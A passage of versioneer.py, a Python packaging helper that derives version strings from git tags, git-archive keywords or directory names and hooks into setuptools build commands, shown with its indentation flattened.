"or in a way that lets it use sys.argv[0] to find the root "
"(like 'python path/to/setup.py COMMAND').")
raise VersioneerBadRootError(err)
try:
# Certain runtime workflows (setup.py install/develop in a setuptools
# tree) execute all dependencies in a single python process, so
# "versioneer" may be imported multiple times, and python's shared
# module-import table will cache the first one. So we can't use
# os.path.dirname(__file__), as that will find whichever
# versioneer.py was first imported, even in later projects.
me = os.path.realpath(os.path.abspath(__file__))
if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]:
print("Warning: build in %s is using versioneer.py from %s"
% (os.path.dirname(me), versioneer_py))
except NameError:
pass
return root
def get_config_from_root(root):
"""Read the project setup.cfg file to determine Versioneer config."""
# This might raise EnvironmentError (if setup.cfg is missing), or
# configparser.NoSectionError (if it lacks a [versioneer] section), or
# configparser.NoOptionError (if it lacks "VCS="). See the docstring at
# the top of versioneer.py for instructions on writing your setup.cfg .
setup_cfg = os.path.join(root, "setup.cfg")
parser = configparser.SafeConfigParser()
with open(setup_cfg, "r") as f:
parser.readfp(f)
VCS = parser.get("versioneer", "VCS") # mandatory
def get(parser, name):
if parser.has_option("versioneer", name):
return parser.get("versioneer", name)
return None
cfg = VersioneerConfig()
cfg.VCS = VCS
cfg.style = get(parser, "style") or ""
cfg.versionfile_source = get(parser, "versionfile_source")
cfg.versionfile_build = get(parser, "versionfile_build")
cfg.tag_prefix = get(parser, "tag_prefix")
if cfg.tag_prefix in ("''", '""'):
cfg.tag_prefix = ""
cfg.parentdir_prefix = get(parser, "parentdir_prefix")
cfg.verbose = get(parser, "verbose")
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
# these dictionaries contain VCS-specific tools
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
return None
return stdout
LONG_VERSION_PY['git'] = '''
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.15+dev (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "%(DOLLAR)sFormat:%%d%(DOLLAR)s"
git_full = "%(DOLLAR)sFormat:%%H%(DOLLAR)s"
keywords = {"refnames": git_refnames, "full": git_full}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "%(STYLE)s"
cfg.tag_prefix = "%(TAG_PREFIX)s"
cfg.parentdir_prefix = "%(PARENTDIR_PREFIX)s"
cfg.versionfile_source = "%(VERSIONFILE_SOURCE)s"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %%s" %% dispcmd)
print(e)
return None
else:
if verbose:
print("unable to find command, tried %%s" %% (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %%s (error)" %% dispcmd)
return None
return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
"""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '%%s', but '%%s' doesn't start with "
"prefix '%%s'" %% (root, dirname, parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None}
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %%d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%%s', no digits" %% ",".join(refs-tags))
if verbose:
print("likely tags: %%s" %% ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %%s" %% r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
if not os.path.exists(os.path.join(root, ".git")):
if verbose:
print("no .git in %%s" %% root)
raise NotThisMethod("no .git directory")
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%%s*" %% tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%%s'"
%% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%%s' doesn't start with prefix '%%s'"
print(fmt %% (full_tag, tag_prefix))
pieces["error"] = ("tag '%%s' doesn't start with prefix '%%s'"
%% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%%d.g%%s" %% (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%%d.g%%s" %% (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%%d" %% pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%%d" %% pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%%s" %% pieces["short"]
else:
# exception #1
rendered = "0.post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%%s" %% pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"]}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%%s'" %% style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree"}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version"}
'''
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs-tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
if not os.path.exists(os.path.join(root, ".git")):
if verbose:
print("no .git in %s" % root)
raise NotThisMethod("no .git directory")
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
return pieces
def do_vcs_install(manifest_in, versionfile_source, ipy):
"""Git-specific installation logic for Versioneer.
For Git, this means creating/changing .gitattributes to mark _version.py
for export-time keyword substitution.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
files = [manifest_in, versionfile_source]
if ipy:
files.append(ipy)
try:
me = __file__
if me.endswith(".pyc") or me.endswith(".pyo"):
me = os.path.splitext(me)[0] + ".py"
versioneer_file = os.path.relpath(me)
except NameError:
versioneer_file = "versioneer.py"
files.append(versioneer_file)
present = False
try:
f = open(".gitattributes", "r")
for line in f.readlines():
if line.strip().startswith(versionfile_source):
if "export-subst" in line.strip().split()[1:]:
present = True
f.close()
except EnvironmentError:
pass
if not present:
f = open(".gitattributes", "a+")
f.write("%s export-subst\n" % versionfile_source)
f.close()
files.append(".gitattributes")
run_command(GITS, ["add", "--"] + files)
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
"""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '%s', but '%s' doesn't start with "
"prefix '%s'" % (root, dirname, parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None}
SHORT_VERSION_PY = """
# This file was generated by 'versioneer.py' (0.15+dev) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
import sys
version_json = '''
%s
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
"""
def versions_from_file(filename):
"""Try to determine the version from _version.py if present."""
try:
with open(filename) as f:
contents = f.read()
except EnvironmentError:
raise NotThisMethod("unable to read _version.py")
mo = re.search(r"version_json = '''\n(.*)''' # END VERSION_JSON",
contents, re.M | re.S)
if not mo:
raise NotThisMethod("no version_json in _version.py")
return json.loads(mo.group(1))
def write_to_version_file(filename, versions):
"""Write the given version number to the given _version.py file."""
os.unlink(filename)
contents = json.dumps(versions, sort_keys=True,
indent=1, separators=(",", ": "))
with open(filename, "w") as f:
f.write(SHORT_VERSION_PY % contents)
print("set %s to '%s'" % (filename, versions["version"]))
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"]}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None}
class VersioneerBadRootError(Exception):
"""The project root directory is unknown or missing key files."""
def get_versions(verbose=False):
"""Get the project version from whatever source is available.
Returns dict with two keys: 'version' and 'full'.
"""
if "versioneer" in sys.modules:
# see the discussion in cmdclass.py:get_cmdclass()
del sys.modules["versioneer"]
root = get_root()
cfg = get_config_from_root(root)
assert cfg.VCS is not None, "please set [versioneer]VCS= in setup.cfg"
handlers = HANDLERS.get(cfg.VCS)
assert handlers, "unrecognized VCS '%s'" % cfg.VCS
verbose = verbose or cfg.verbose
assert cfg.versionfile_source is not None, \
"please set versioneer.versionfile_source"
assert cfg.tag_prefix is not None, "please set versioneer.tag_prefix"
versionfile_abs = os.path.join(root, cfg.versionfile_source)
# extract version from first of: _version.py, VCS command (e.g. 'git
# describe'), parentdir. This is meant to work for developers using a
# source checkout, for users of a tarball created by 'setup.py sdist',
# and for users of a tarball/zipball created by 'git archive' or github's
# download-from-tag feature or the equivalent in other VCSes.
get_keywords_f = handlers.get("get_keywords")
from_keywords_f = handlers.get("keywords")
if get_keywords_f and from_keywords_f:
try:
keywords = get_keywords_f(versionfile_abs)
ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)
if verbose:
print("got version from expanded keyword %s" % ver)
return ver
except NotThisMethod:
pass
try:
ver = versions_from_file(versionfile_abs)
if verbose:
print("got version from file %s %s" % (versionfile_abs, ver))
return ver
except NotThisMethod:
pass
from_vcs_f = handlers.get("pieces_from_vcs")
if from_vcs_f:
try:
pieces = from_vcs_f(cfg.tag_prefix, root, verbose)
ver = render(pieces, cfg.style)
if verbose:
print("got version from VCS %s" % ver)
return ver
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
if verbose:
print("got version from parentdir %s" % ver)
return ver
except NotThisMethod:
pass
if verbose:
print("unable to compute version")
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None, "error": "unable to compute version"}
def get_version():
"""Get the short version string for this project."""
return get_versions()["version"]
def get_cmdclass():
"""Get the custom setuptools/distutils subclasses used by Versioneer."""
if "versioneer" in sys.modules:
del sys.modules["versioneer"]
# this fixes the "python setup.py develop" case (also 'install' and
# 'easy_install .'), in which subdependencies of the main project are
# built (using setup.py bdist_egg) in the same python process. Assume
# a main project A and a dependency B, which use different versions
# of Versioneer. A's setup.py imports A's Versioneer, leaving it in
# sys.modules by the time B's setup.py is executed, causing B to run
# with the wrong versioneer. Setuptools wraps the sub-dep builds in a
# sandbox that restores sys.modules to it's pre-build state, so the
# parent is protected against the child's "import versioneer". By
# removing ourselves from sys.modules here, before the child build
# happens, we protect the child from the parent's versioneer too.
# Also see https://github.com/warner/python-versioneer/issues/52
cmds = {}
# we add "version" to both distutils and setuptools
from distutils.core import Command
class cmd_version(Command):
description = "report generated version string"
user_options = []
boolean_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
vers = get_versions(verbose=True)
print("Version: %s" % vers["version"])
print(" full-revisionid: %s" % vers.get("full-revisionid"))
print(" dirty: %s" % vers.get("dirty"))
if vers["error"]:
print(" error: %s" % vers["error"])
cmds["version"] = cmd_version
# we override "build_py" in both distutils and setuptools
#
# most invocation pathways end up running build_py:
# distutils/build -> build_py
# distutils/install -> distutils/build ->..
# setuptools/bdist_wheel -> distutils/install ->..
# setuptools/bdist_egg -> distutils/install_lib -> build_py
# setuptools/install -> bdist_egg ->..
# setuptools/develop -> ?
# we override different "build_py" commands for both environments
if "setuptools" in sys.modules:
from setuptools.command.build_py import build_py as _build_py
else:
from distutils.command.build_py import build_py as _build_py
class cmd_build_py(_build_py):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
_build_py.run(self)
# now locate _version.py in the new build/ directory and replace
# it with an updated value
if cfg.versionfile_build:
target_versionfile = os.path.join(self.build_lib,
cfg.versionfile_build)
print("UPDATING %s" % target_versionfile)
